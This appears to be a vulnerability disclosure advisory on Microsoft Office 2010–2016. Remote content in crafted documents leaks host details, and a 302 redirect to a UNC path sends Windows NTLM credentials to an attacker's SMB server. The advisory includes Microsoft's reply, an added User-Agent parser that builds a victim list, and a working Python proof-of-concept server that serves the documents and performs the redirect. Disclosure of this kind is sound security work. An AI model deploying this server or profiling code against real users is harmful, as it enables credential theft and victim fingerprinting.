The following advisory describes an information disclosure found in Microsoft Office versions 2010, 2013, and 2016.
Microsoft Office is: “Whether you’re working or playing, Microsoft is here to help. We’re the company that created Microsoft Office, including Office 365 Home, Office 365 Personal, Office Home & Student 2016, Office Home & Business 2016, and Office Professional 2016. You can also get Office for Mac. Whatever your needs—whether professional or simply for fun—we’ve got you covered. The powerful software in Microsoft Office 2013 remains in Microsoft Office 2016.”
An independent security researcher, Björn Ruytenberg, has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.
Microsoft was informed of the vulnerability, and responded with:
“Upon investigation, we have determined that this submission does not meet the bar for security servicing. Unfortunately images are commonly used in emails and other locations that are sourced from external sites, those sites can use that request for basic tracking information. Your report about SMBTrap is also a well documented publicly disclosed item and would not meet the bar. In addition the PoC requires a user to disable their security, specifically the Protected View, stating that they trust the source.
As such, this email thread has been closed and will no longer be monitored.”
The Microsoft Office document format allows embedding remote content, such as images, that is hosted on any HTTP server. When such a document is opened, Office fetches the remote content and renders it. This mechanism can be abused to disclose information to an attacker-controlled server:
An attacker sends the victim a malicious Office file that references remote content.
When the victim opens the file, Office issues an HTTP request for that content to the attacker-controlled web server. The request's User-Agent header already reveals details about the victim's host environment.
The attacker's server answers with an HTTP 302 redirect to a file:// UNC path. Office follows the redirect, which turns the HTTP fetch into an SMB connection to the attacker's host, where the victim's Windows credentials can be captured (e.g. with SMBTrap). In total, the attacker obtains the following from the victim's machine:
- Victim host environment information:
  - Host IP address (*)
  - Windows version
  - Office version
  - Installed .NET Framework runtimes
  - Presence of the Tablet PC subsystem (**)
- Windows user credentials: username and NTLM password hash. This allows an attacker to:
  - Mount a "Pass-the-Hash" attack: the username and hash can be used to log on to a third-party host that the victim is authorized to access. (Caveat: what a rogue SMB server captures is the NTLM challenge-response, i.e. a Net-NTLMv1/v2 value, not the stored NT hash; it can be relayed to another host while the challenge is live or cracked offline, but it is not directly usable for pass-the-hash.)
  - Derive the originating plaintext password using brute-forcing tools (***)
(*) The IP address exposed to the attacker’s server depends on the document payload. If the payload references an external host, i.e. outside the local network, the victim host’s external IP address will be exposed to the attacker server. Similarly, if referencing an internal server, the victim host’s internal IP address will be exposed to the attacker server.
(**) If present, the "Tablet PC" substring in the User-Agent header likely indicates that the victim's machine is a tablet device, or hybrid equipment that provides a touch screen.
(***) The Exploit section further discusses these scenarios.
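The host environment items listed above are read from the User-Agent header that Office sends with the remote content fetch (the PoC server below only logs it verbatim). The following added example, which is not part of the original advisory, parses that header into the listed fields and groups the PoC server's log lines by victim IP. The sample header and log lines are constructed for the example in the shape Office's MSO HTTP client uses (an MSIE-compatible token list carrying ".NET CLR ..." entries, "Tablet PC 2.0", "ms-office" and "MSOffice 16"); the mapping from NT kernel versions and MSOffice numbers to product names is an assumption of the example, not something the advisory states.

```python
import re

# Constructed sample (not a capture from the advisory) in the shape of the
# User-Agent header Office sends when fetching linked content.
SAMPLE_UA = ("Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; "
             ".NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; "
             ".NET4.0C; .NET4.0E; Tablet PC 2.0; ms-office; MSOffice 16)")

# Constructed lines in the format the advisory's PoC server prints.
SAMPLE_LOG = [
    "203.0.113.7: HTTP GET '/img/logo.png'",
    "203.0.113.7: User-Agent: " + SAMPLE_UA,
    "  Sending HTTP 302 file://///192.0.2.10/some/path",
]

# Assumed mappings from kernel / major version tokens to product names.
WINDOWS_NAMES = {"6.1": "Windows 7", "6.2": "Windows 8", "6.3": "Windows 8.1",
                 "10.0": "Windows 10"}
OFFICE_NAMES = {"14": "Office 2010", "15": "Office 2013", "16": "Office 2016"}

LOG_UA = re.compile(r"^(\S+): User-Agent: (.*)$")


def parse_office_ua(ua):
    """Extract Windows/Office/.NET/Tablet PC details from an Office User-Agent."""
    start, end = ua.find("("), ua.rfind(")")
    tokens = [t.strip() for t in ua[start + 1:end].split(";")] if start >= 0 < end else []
    info = {"is_office": "ms-office" in tokens, "wow64": "WOW64" in tokens,
            "windows": None, "office": None, "dotnet": [], "tablet_pc": False}
    for t in tokens:
        m = re.match(r"Windows NT (\d+\.\d+)", t)
        if m:
            info["windows"] = WINDOWS_NAMES.get(m.group(1), "Windows NT " + m.group(1))
        m = re.match(r"MSOffice (\d+)", t)
        if m:
            info["office"] = OFFICE_NAMES.get(m.group(1), "Office (major version " + m.group(1) + ")")
        if t.startswith(".NET"):          # ".NET CLR x.y.z" and ".NET4.0C/E" style tokens
            info["dotnet"].append(t)
        if t.startswith("Tablet PC"):
            info["tablet_pc"] = True
    return info


def victims_from_log(lines):
    """Group the User-Agent lines of the PoC server's output by client IP."""
    victims = {}
    for line in lines:
        m = LOG_UA.match(line)
        if m:
            victims[m.group(1)] = parse_office_ua(m.group(2))
    return victims


if __name__ == "__main__":
    for ip, info in victims_from_log(SAMPLE_LOG).items():
        print(ip, info)
```

Only requests whose User-Agent carries the "ms-office" token come from Office itself; a browser fetching the same URL is reported with is_office False, which keeps mail-client image prefetches and crawlers out of the victim list.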
The vulnerability can be exploited through:
- Opening a specially-crafted, local MS Office document (DOCX, XLSX) that embeds the malicious content. No additional user interaction is required.
- Opening a specially-crafted MS Office document, downloaded from a remote server. In this scenario, disabling “Protected View”, i.e. clicking “Enable Editing”, is required to exploit the vulnerability. However, enabling macros is _not_ required.
Proof of Concept
import os.path
import sys

import tornado.ioloop
import tornado.web

# Microsoft Office Information Disclosure Vulnerability
#
# This Python script hosts an HTTP server, fulfilling three purposes:
# - Victim host info logging:
#   Logs the User-Agent exposed by the victim machine, including the following host environment info:
#   Windows version, Office version, installed .NET runtime versions, presence of Tablet PC subsystem
# - Serves the malicious Office documents:
#   Note: this is to demonstrate a remote exploitation scenario. The documents may be hosted elsewhere,
#   or distributed through other means (e.g. email).
# - Redirects the user (HTTP 302) to a malicious SMB server that captures Windows user credentials (e.g. SMBtrap).

smbServerAddr = "IP"  # Host running SMBtrap


class HandleRequest(tornado.web.RequestHandler):
    def get(self):
        print(self.request.remote_ip + ": HTTP GET '" + self.request.path + "'")
        print(self.request.remote_ip + ": User-Agent: " + self.request.headers.get("User-Agent", ""))

        if self.request.path == "/favicon.ico":
            self.set_status(404, "Not Found")
        elif self.request.path.startswith('/poc_'):
            # Serve the poc_*.docx / poc_*.xlsx files from the script working directory
            officePocPath = os.getcwd() + self.request.path
            if self.request.path.endswith('.docx'):
                self.set_header("Content-Type",
                                "application/vnd.openxmlformats-officedocument.wordprocessingml.document")
            else:
                self.set_header("Content-Type",
                                "application/vnd.openxmlformats-officedocument.spreadsheetml.sheet")

            if os.path.exists(officePocPath):
                print("  Serving " + self.request.path)
                with open(officePocPath, 'rb') as f:
                    data = f.read()
                self.write(data)
                self.finish()
            else:
                print("  Cannot serve " + self.request.path + ": file not found in script working directory.")
        else:
            # Any other request (i.e. the remote content fetch issued by Office when the document is opened)
            # is bounced to a UNC path on the SMB server, so that Office authenticates there
            print("  Sending HTTP 302 file://///" + smbServerAddr + "/some/path")
            self.set_status(302, "Found")
            self.redirect("file://///" + smbServerAddr + "/some/path")


application = tornado.web.Application([
    (r".*", HandleRequest),
])

if __name__ == "__main__":
    port = 80
    if len(sys.argv) > 1:
        port = int(sys.argv[1])
    application.listen(port)
    tornado.ioloop.IOLoop.instance().start()